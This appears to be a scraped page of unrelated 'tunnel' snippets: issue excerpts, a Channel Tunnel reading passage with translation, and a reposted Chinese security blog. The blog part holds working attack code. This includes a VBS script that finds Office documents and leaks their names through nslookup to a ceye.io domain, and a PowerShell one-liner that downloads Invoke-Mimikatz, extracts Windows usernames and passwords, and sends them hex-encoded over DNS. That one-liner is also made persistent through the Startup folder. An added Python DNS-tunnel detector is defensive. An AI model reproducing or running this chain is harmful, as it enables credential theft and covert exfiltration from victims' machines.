  • Tunnel improvements

    2021-01-09 03:38:18
    * Message (de)serialization * Before Twisted writes to a socket, it first spends a lot of time in isIPAddress / isIPv6Address * Remove isinstance calls from byte ...
  • WIP, but using a PR to make review easier. This question comes from the open-source project: betagouv/beta.gouv.fr
  • The Channel Tunnel

    2019-09-19 00:44:59


    Original text

    In 1858, a French engineer, Aime Thome De Gamond, arrived in England with a plan for a twenty-one-mile tunnel under the English Channel. He said that it would be possible to build a platform in the center of the Channel. This platform would serve as a port and a railway station. The tunnel would be well-ventilated if tall chimneys were built above sea level. In 1860, a better plan was put forward by an Englishman, William Low. He suggested that a double railway-tunnel should be built. This would solve the problem of ventilation, for if a train entered this tunnel, it would draw in fresh air behind it. Forty-two years later a tunnel was actually begun. If, at the time, the British had not feared invasion, it would have been completed. The world had to wait almost another 100 years for the Channel Tunnel. It was officially opened on March 7, 1994, finally connecting Britain to the European continent.


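    Translation

    In 1858, a French engineer named Aime Thome De Gamond had the idea of building a 21-mile tunnel under the English Channel to reach England. He said a platform could be built in the middle of the Channel. This platform could serve as a port and a railway station. Building some huge chimneys that rise above sea level would give the tunnel good ventilation. In 1860, a better idea was put forward by an Englishman, William. His suggestion was to build a double railway tunnel. This would solve the ventilation problem: if a train entered the tunnel, it would draw fresh air in. Forty-two years later, work on a tunnel had begun. Had the British not feared invasion at the time, the tunnel would have been finished long ago. The people of the world had to wait nearly 100 years for this undersea tunnel to be completed. It finally opened on April 7, 1994, at last connecting England to the European continent.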

    Reposted from: https://my.oschina.net/robinsonlu/blog/517749

  • An experimental implementation (by ) already exists (https://github.com/devos50/tribler/commit/71402bff2db51e2e14d671642907d6c9069de5d7) for reference. One possible backward compatible ...
  • SSH domain.de port 2212 username sshkey mysql localhost 3306 username password databasename To Reproduce: I don't know how to comprehend this. But in the screen you can see quite well ...
  • Tunnel quantity in leaseset

    2020-11-29 09:48:18
    According to the i2pc spec https://geti2p.net/de/docs/protocol/i2cp up to 16 tunnels in a leaseset should be supported ( minus a few to be on the safe side ). My understanding is that ...
  • 1. When ovs-dpdk has some tunnel ports, I can see the listening ports through the command ovs-appctl tnl/ports/show -v. 2. When one tunnel port is deleted, the listening ports ...
  • 7242de43a41b265593667276bbafab9621f7747ce0de5f19f40e5cefdcbac907, nodePort=40000]. ..09:57:32.351 [AutoStartProxyPoolPoller] INFO d.z.e.z.p.DockeredSeleniumStarter - Created container [docker_...
  • SHA256: bd92aef20fb8dbbfddbc8f3b29d2452f6e04bd02e65b534cedaf14e29fd387de Session info: > library(ssh) > library(mongolite) > devtools::session_...
  • apparently creates a name that the ngrok api is not able to process correctly, specifically for listing tunnel info or deleting tunnel. Steps to Reproduce: from ...
  • Identify the places where we still add parameters in the on_change calls and try to use web_context_tunnel to increase compatibility with the other modules. Try to get merges ...
  • Works fine when launched on the native terminal. This question comes from the open-source project:...
  • Notes: The Sauce Tunnel ...
  • Addresses issue #3143....(cherry picked from commit 200a4fdc76427265de0339d81ecf05cab5fd7067) Conflicts: proxy/http/HttpSM.cc This question comes from the open-source project: apache/trafficserver
  • The Makefile for porting to openwrt/lede is easy to write, but I don't know Lua and can't write the luci interface. Please help, thanks. This question comes from the open-source project: wangyu-/udp2raw-tunnel
  • s status message the kubectl command creates a tunnel to the dashboard pod and the name of this pod is missing the first character : powershell (Get-Job -Name 'Kubectl-Tunnel')....
  • Expected behavior: Field and value should ...
  • 3 com.thepeppersstudio.MongoHub 0x000000010003d73a -[Tunnel readStatus] + 171 4 com.thepeppersstudio.MongoHub 0x0000000100021baa -[ConnectionWindowController checkTunnel] + 257 5 ...
  • Check list: Check if done. Strikethrough if not relevant: ~~example~~ ...
  • Prior to this change, HTTP/2 has its own ChunkedHandler and do de-chunk in Http2Stream. But think about HTTP/1.0, it doesn't support chunked transfer coding either, but HttpTunnel can ...
  • cron/parse.spec.js (https://github.com/vatesfr/xen-orchestra/blob/b24400b21de1ebafa1099c56bac1de5c988d9202/%40xen-orchestra/cron/src/parse.spec.js)) [ ] if xo-...
  • Access Challenge (11), id: 0x08, Authenticator: 113c2de5c5f0785a7b67d8a41c052930 This is where the client will start to complain. eapol_test (of wpa_supplicant) says this: ...
  • This commit modifies the /lib/netifd/proto/gre.sh script so that, when GRE-TAP tunnels are created, either IPv4 or IPv6, the prefix before the chosen ...lede-project/source
  • This is a bug report for confirmation errors on KNX tunnel connections that don't happen only through polling (i.e....A description of this problem can be found in the thread ...
  • This question comes from the open-source project: Kevin-De-Koninck/Clean-Me
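  • Excerpted from: https://hk.saowen.com/a/a06909f1c57cb8452db969b3deede4151de42a7d69f4bb52c5bf027033fb91bd PowerShell DNS experiment verification: 1. Building a DNS tunnel with PowerShell a) Write the simplest possible one-line script that gets the service list ...

    Excerpted from: https://hk.saowen.com/a/a06909f1c57cb8452db969b3deede4151de42a7d69f4bb52c5bf027033fb91bd

    PowerShell DNS experiment verification:

    1. Building a DNS tunnel with PowerShell

    a)      Write the simplest possible one-line script that gets the service list

    b)      Use nishang's Out-DnsTxt to convert the script GetServiceToTxt.ps1 into TXT records

    c)      Create the corresponding TXT records on the DNS server (later execution follows the order 1, 2, 3, 4, so the record is named 1)

    Verification result: OK

    d)      Use nishang's DNS_TXT_Pwnage to read the TXT record and execute it (the script automatically prepends 1 to test.com and requests the TXT record of 1.test.com to run as a script. The author never did work out how the stopstring parameter works; if you understand it, please send a private message, thanks!). The service list is retrieved normally.

    The command and result are as follows: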

    DNS_TXT_Pwnage -startdomainstartflag.test.com -cmdstring nostart -commanddomain  txt1.test.com -psstring startflag -psdomain test.com -Subdomains 1 -stopstring stopflag

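    2. Packet capture of the exfiltrated result:

    Captured and analyzed with Microsoft Network Monitor

    3. Matching against the detection logic:

    a)      The experiment did not exfiltrate results, so the domain names are not long; a DNS tunnel that exfiltrates data must use long domain names

    b)      The experiment did not exfiltrate results, so the frequency is low, and only the remote get-server function is fetched, which also keeps the frequency low; exfiltrating data and fetching more functionality (such as mimikatz) would necessarily require a high frequency

    c)      The record type is TXT, with response packets

    d)      There is no A-record resolution result, so no process initiates access to a result

    e)      This experiment scenario does not cover exfiltrated data, so the registration question does not arise

    Conclusion: remote-control trojan (the experiment's functionality is fairly limited; extended into a full-featured trojan, it would match the detection characteristics precisely)

    Exfiltration experiment verification using ceye.io

    1. Small-volume and large-volume information theft

    a)      Single, small-volume exfiltration: simple Windows commands (ping, nslookup, etc.) are enough to steal the machine name

    b)      Repeated, large-volume theft: write a script that searches for documents (Word, Excel, PPT) and exfiltrates the document names (360 did not alert on this script). The VBS script is as follows (the code has not been fully verified and is not guaranteed to be error-free; modify it yourself for Chinese support or to read document contents):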

    'On ErrorResume Next

    Set fso =CreateObject("Scripting.FileSystemObject")

    toolsName=Array(".docx",".doc",".xls",".xlsx",".ppt",".pptx")

    'ConstDRIVE_LETTERS="C:D:E:F:G:H:I:J:K:L:M:N:O:P:Q:R:S:T:U:V:W:X:Y:Z"

    ConstDRIVE_LETTERS="o"

    ''''''''''''Start the search

    CallScanDrives()                      

    ''''''''''''''''''''

    SubScanDrives()

    Dim drives

    drives=Split(DRIVE_LETTERS,":")

    For Each drv In drives

    If fso.DriveExists(drv) Then

    Set drive=fso.GetDrive(drv)

    If drive.isReady Then

    CallScanFiles(drive.RootFolder)

    End If

    End If

    Next

    End Sub

    ''''''''''''

    SubScanFiles(folder)

    For Each this_file In folder.Files

    On Error Resume Next

    Call FindKeyFile(this_file)

    WScript.Sleep 1

    Next

    For Each this_folder In folder.SubFolders

    On Error Resume Next

    Call ScanFiles(this_folder)

    WScript.Sleep 1

    Next   

    End Sub

    '''''''''''Find specific documents

    SubFindKeyFile(file)

    On Error Resume Next

    For Each tool_name In toolsName

    'WScript.Echo

    ''''Convert document names to upper case for matching

    IfInStr(UCase(file.name),UCase(tool_name)) <>0 Then

    DnsStr= file.name &".xxxxxxx.ceye.io"

    ''''Silent upload via nslookup

    setobjShell=wscript.createObject("wscript.shell")

    objShell.exec("%comspec% /c nslookup " & DnsStr)

    End If

    Next

    End Sub

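    2. Exfiltration results:

    a)      Single, small-volume exfiltration

    b)      Repeated, large-volume theft

    3. Matching against the detection logic:

    a)      Exfiltration uses A records rather than TXT responses; the names are not overly long (for experimental reasons the available domain-name length was not fully used), but the frequency is fairly high. No anomaly was found in the resolution process (however, the screenshot shows 8.8.8.8; using a DNS server other than the system's carries some risk)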
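
An added example, not part of the original article: the traits named in the two detection analyses above (long names, high query frequency toward one parent domain, TXT-dominated traffic) written as a scorer over resolver log records. The record layout, the thresholds and the sample records are assumptions constructed for illustration.

```python
from collections import defaultdict

def parent_domain(qname, labels=2):
    """Naive parent-zone guess: the last `labels` labels (assumption: no public-suffix list)."""
    return ".".join(qname.rstrip(".").lower().split(".")[-labels:])

def flag_tunnel_like(records, max_label=40, max_unique_per_min=15,
                     max_txt_ratio=0.5, min_queries=3):
    """records: (epoch_seconds, client_ip, qname, qtype) tuples from a resolver log.
    Returns {(client, parent): [reasons]}; all thresholds are illustrative assumptions."""
    groups = defaultdict(list)
    for ts, client, qname, qtype in records:
        groups[(client, parent_domain(qname))].append((ts, qname.lower(), qtype.upper()))
    findings = {}
    for key, rows in groups.items():
        if len(rows) < min_queries:
            continue
        reasons = []
        # Long names: exfiltrated data has to be packed into the labels.
        if max(len(label) for _, q, _ in rows for label in q.split(".")) > max_label:
            reasons.append("long-label")
        # Frequency: many distinct names under one parent per minute.
        times = [ts for ts, _, _ in rows]
        minutes = max((max(times) - min(times)) / 60.0, 1.0)
        if len({q for _, q, _ in rows}) / minutes > max_unique_per_min:
            reasons.append("high-unique-rate")
        # Record type: traffic to one parent dominated by TXT lookups.
        if sum(t == "TXT" for _, _, t in rows) / len(rows) > max_txt_ratio:
            reasons.append("txt-heavy")
        if reasons:
            findings[key] = reasons
    return findings

def sample_log():
    """Constructed records (not captured traffic) using reserved example names."""
    log = [(i * 20, "10.0.0.5", n, "A") for i, n in enumerate(
        ["www.example.com", "mail.example.com", "www.example.com", "cdn.example.com"])]
    # Numbered TXT lookups fetched in order, as in the first experiment.
    log += [(100 + i * 5, "10.0.0.7", f"{i}.example.org", "TXT") for i in range(1, 5)]
    # Many short A lookups that carry file names, as in the second experiment.
    log += [(200 + i, "10.0.0.9", f"report{i:02d}.docx.example.net", "A") for i in range(30)]
    # Hex-packed 50-character label, longer than the threshold.
    log += [(300 + i, "10.0.0.11", "41" * 25 + f".{i}.lab.example", "A") for i in range(3)]
    return log

if __name__ == "__main__":
    for key, reasons in sorted(flag_tunnel_like(sample_log()).items()):
        print(key, reasons)
```

The second experiment's traffic is caught only by the frequency check, which is why a length threshold alone is not sufficient.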

     

     

     

     

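    Sending Windows account passwords back using PowerShell and ceye.io

    I have recently been studying PowerShell. The main reason I never got used to Windows was its weak command-line tooling, but after learning a little about PowerShell I was nearly floored; it really is a remarkable tool. PowerShell is defined as a command-line shell and scripting environment that lets command-line users and script writers use the power of the .NET Framework. Put simply, it is like bash on Linux. PowerShell has many advantages, but being fileless and shipping with the operating system are by themselves enough to establish its position. mimikatz is a go-to post-exploitation (not privilege escalation) tool for hackers; one of its functions is to obtain Windows plaintext passwords under an administrator account, and there is now a PowerShell version as well. The flow I wanted to test: obtain the Windows information through PowerShell, extract the key username and password, encode them, and then access ceye.io, so that the Windows account information can be retrieved.

    0×01 Saving mimikatz output from Windows into a variable

    mimikatz now has a PowerShell version, and it is delivered over HTTP, which makes evading antivirus easier than with an exe; antivirus evasion is not discussed here.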

    IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');

    $Mimikatzinfo = invoke-mimikatz;

    $Mimikatzinfo

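    0×02 Extracting the key content with PowerShell regular expressions

    Looking at the fields, what we want is the content after Username and Password. PowerShell inherits .NET's regular-expression syntax, which differs somewhat from Python's in practice; after looking things up for quite a while, I finally got it working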

    $Mimikatzinfo = invoke-mimikatz;

    $regex = [regex]".*Username : (.*?)\n.*\n.*Password : (.*?)\n";

    $word = ($regex.Matches($Mimikatzinfo)| %{$_.value})

    The content we want is the third group of word

    $username=$word[2].split("*")[1].split(":")[1];
    $password=$word[2].split("*")[3].split(":")[1];
    $full=$username.trim()+"_"+$password.trim();

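    0×03 Encoding and access

    Domain names may not contain special characters, and also with bypassing in mind, the username and password are converted to hexadecimal before the request is made (replace ceye.io with your own)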

    $ab = [System.Text.Encoding]::UTF8.GetBytes($full);

    $luffy=[System.BitConverter]::ToString($ab);$onepiece=$luffy.replace("-","");

    $wc=new-object System.Net.webclient;$result=$wc.downloadstring("http://"+$onepiece+".sss.ceye.io");

    0×04 Starting automatically at boot

    Create 1.cmd

    PowerShell -Command "Set-ExecutionPolicy Unrestricted" >> "%TEMP%\StartupLog.txt" 2>&1 
    PowerShell C:\Users\Administrator\Desktop\script.ps1 >> "%TEMP%\StartupLog.txt" 2>&1

    Create script.ps1, a one-liner that does all of the above

    IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');$Mimikatzinfo = invoke-mimikatz;$regex = [regex]".*Username : (.*?)\n.*\n.*Password : (.*?)\n";$word = ($regex.Matches($Mimikatzinfo)| %{$_.value});$username=$word[2].split("*")[1].split(":")[1];$password=$word[2].split("*")[3].split(":")[1];$full=$username.trim()+"_"+$password.trim();$ab = [System.Text.Encoding]::UTF8.GetBytes($full);$luffy=[System.BitConverter]::ToString($ab);$onepiece=$luffy.replace("-","");$wc=new-object System.Net.webclient;$result=$wc.downloadstring("http://"+$onepiece+".rzzz.ceye.io");

    Put 1.cmd in the Startup folder

    0×05 Decoding

    $pass=""

    $t="41646d696e6973747261746f725f6c7566667931323321"

    $t -split '(.{2})' |%{ if ($_ -ne "") { $pass+=[CHAR]([CONVERT]::toint16("$_",16))  }}

    write $pass

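    Afterword

    PowerShell's power goes well beyond this. For hackers it is a treasure trove, and more and more mature hacking tools target PowerShell, such as metasploit, powersploit and set. PowerShell's programmability and tight integration with Windows also enable all sorts of sneaky tricks; for example, using the Startup folder for boot persistence as above is very crude, and PowerShell combined with WMI can achieve fileless startup. "The road ahead is long and far; I shall search high and low."

    *Author of this article: s1riu5; when reposting, please credit Freebuf.COM

    Reposted from: https://www.cnblogs.com/bonelee/p/8259188.html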
  • # 3496fb7de0441eafbd8c4f61577709db And obviously the incoming packets are dropped by the ipv6 "Default deny all" rule. Replacing both occurrences of re0 (the ...
  • http://firmware.koolshare.cn/LEDE_X64_fw867/ The lede here is done quite well; could integration be based on this lede as a template? This question comes from the open-source project: wangyu-/udp2raw-tunnel
